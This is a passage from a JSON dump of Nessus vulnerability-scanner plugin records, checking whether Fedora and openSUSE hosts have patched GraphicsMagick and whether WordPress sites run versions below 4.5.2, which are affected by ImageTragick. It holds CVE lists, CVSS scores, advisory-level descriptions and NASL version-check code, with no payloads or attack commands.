"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:47:24", "description": "http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-01T00:00:00", "type": "nessus", "title": "Fedora 29 : GraphicsMagick (2019-425a1aa7c9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2020-01-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-425A1AA7C9.NASL", "href": "https://www.tenable.com/plugins/nessus/126356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-425a1aa7c9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126356);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11473\", \"CVE-2019-11474\");\n script_xref(name:\"FEDORA\", value:\"2019-425a1aa7c9\");\n\n script_name(english:\"Fedora 29 : GraphicsMagick (2019-425a1aa7c9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-425a1aa7c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6799\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"GraphicsMagick-1.3.32-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:45:56", "description": "New bug and security fix release, see http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-01T00:00:00", "type": "nessus", "title": "Fedora 30 : GraphicsMagick (2019-da4c20882c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2020-01-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-DA4C20882C.NASL", "href": "https://www.tenable.com/plugins/nessus/126361", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-da4c20882c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126361);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11473\", \"CVE-2019-11474\");\n script_xref(name:\"FEDORA\", value:\"2019-da4c20882c\");\n\n script_name(english:\"Fedora 30 : GraphicsMagick (2019-da4c20882c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bug and security fix release, see\nhttp://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-da4c20882c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6799\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"GraphicsMagick-1.3.32-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:56:13", "description": "According to its self-reported version number, the WordPress application running on the remote web server is prior to 4.5.2.\nIt is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as ImageTragick, exists in the ImageMagick library due to a failure to properly filter shell characters in filenames passed to delegate commands. A remote attacker can exploit this, via specially crafted images, to inject shell commands and execute arbitrary code.\n (CVE-2016-3714)\n\n - An unspecified flaw exists in the ImageMagick library in the 'ephemeral' pseudo protocol that allows an attacker to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the ImageMagick library in the 'ms' pseudo protocol that allows an attacker to move arbitrary files to arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the ImageMagick library in the 'label' pseudo protocol that allows an attacker, via a specially crafted image, to read arbitrary files.\n (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability exists due to an unspecified flaw related to request handling between a user and the server. A remote attacker can exploit this, via an MVG file with a specially crafted fill element, to bypass access restrictions and conduct host-based attacks.\n (CVE-2016-3718)\n\n - An unspecified flaw exists in Plupload that allows an attacker to perform a same-origin method execution.\n (CVE-2016-4566)\n\n - A reflected cross-site scripting vulnerability exists in MediaElement.js due to improper validation of user-supplied input. A context-dependent attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-4567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "WordPress < 4.5.2 Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-4566", "CVE-2016-4567"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_4_5_2.NASL", "href": "https://www.tenable.com/plugins/nessus/91101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91101);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\",\n \"CVE-2016-4566\",\n \"CVE-2016-4567\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866,\n 90300\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"WordPress < 4.5.2 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of WordPress.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The PHP application running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the WordPress\napplication running on the remote web server is prior to 4.5.2.\nIt is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists in the ImageMagick library due to a\n failure to properly filter shell characters in filenames\n passed to delegate commands. A remote attacker can\n exploit this, via specially crafted images, to inject\n shell commands and execute arbitrary code.\n (CVE-2016-3714)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'ephemeral' pseudo protocol that allows an attacker\n to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'ms' pseudo protocol that allows an attacker to move\n arbitrary files to arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'label' pseudo protocol that allows an attacker, via\n a specially crafted image, to read arbitrary files.\n (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\n\n - An unspecified flaw exists in Plupload that allows an\n attacker to perform a same-origin method execution.\n (CVE-2016-4566)\n\n - A reflected cross-site scripting vulnerability exists in\n MediaElement.js due to improper validation of\n user-supplied input. A context-dependent attacker can\n exploit this, via a specially crafted request, to\n execute arbitrary script code in a user's browser\n session. (CVE-2016-4567)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/news/2016/05/wordpress-4-5-2/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WordPress version 4.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/WordPress\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"WordPress\";\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"fixed_version\":\"3.7.14\", \"fixed_display\" : \"3.7.14 / 4.5.2\" },\n { \"min_version\":\"3.8\", \"fixed_version\":\"3.8.14\", \"fixed_display\" : \"3.8.14 / 4.5.2\" },\n { \"min_version\":\"3.9\", \"fixed_version\":\"3.9.12\", \"fixed_display\" : \"3.9.12 / 4.5.2\" },\n { \"min_version\":\"4.0\", \"fixed_version\":\"4.0.11\", \"fixed_display\" : \"4.0.11 / 4.5.2\" },\n { \"min_version\":\"4.1\", \"fixed_version\":\"4.1.11\", \"fixed_display\" : \"4.1.11 / 4.5.2\" },\n { \"min_version\":\"4.2\", \"fixed_version\":\"4.2.8\", \"fixed_display\" : \"4.2.8 / 4.5.2\" },\n { \"min_version\":\"4.3\", \"fixed_version\":\"4.3.4\", \"fixed_display\" : \"4.3.4 / 4.5.2\" },\n { \"min_version\":\"4.4\", \"fixed_version\":\"4.4.3\", \"fixed_display\" : \"4.4.3 / 4.5.2\" },\n { \"min_version\":\"4.5\", \"fixed_version\":\"4.5.2\", \"fixed_display\" : \"4.5.2\" }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{xss:TRUE}\n);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:33:53", "description": "This update for GraphicsMagick fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2017-13065: Prevent NULL pointer dereference in the function SVGStartElement (bsc#1055038)\n\n - CVE-2018-5685: Prevent infinite loop and application hang in the ReadBMPImage function. Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value (bsc#1075939)\n\n - CVE-2017-18029: Prevent memory leak in the function ReadMATImage which allowed remote attackers to cause a denial of service via a crafted file (bsc#1076021).\n\n - CVE-2017-18027: Prevent memory leak vulnerability in the function ReadMATImage which allowed remote attackers to cause a denial of service via a crafted file (bsc#1076051).", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2018-122)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13065", "CVE-2017-18027", "CVE-2017-18029", "CVE-2018-5685"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-122.NASL", "href": "https://www.tenable.com/plugins/nessus/106552", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-122.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106552);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13063\", \"CVE-2017-13065\", \"CVE-2017-18027\", \"CVE-2017-18029\", \"CVE-2018-5685\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2018-122)\");\n script_summary(english:\"Check for the openSUSE-2018-122 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2017-13065: Prevent NULL pointer dereference in the\n function SVGStartElement (bsc#1055038)\n\n - CVE-2018-5685: Prevent infinite loop and application\n hang in the ReadBMPImage function. Remote attackers\n could leverage this vulnerability to cause a denial of\n service via an image file with a crafted bit-field mask\n value (bsc#1075939)\n\n - CVE-2017-18029: Prevent memory leak in the function\n ReadMATImage which allowed remote attackers to cause a\n denial of service via a crafted file (bsc#1076021).\n\n - CVE-2017-18027: Prevent memory leak vulnerability in the\n function ReadMATImage which allowed remote attackers to\n cause a denial of service via a crafted file\n (bsc#1076051).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076051\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", 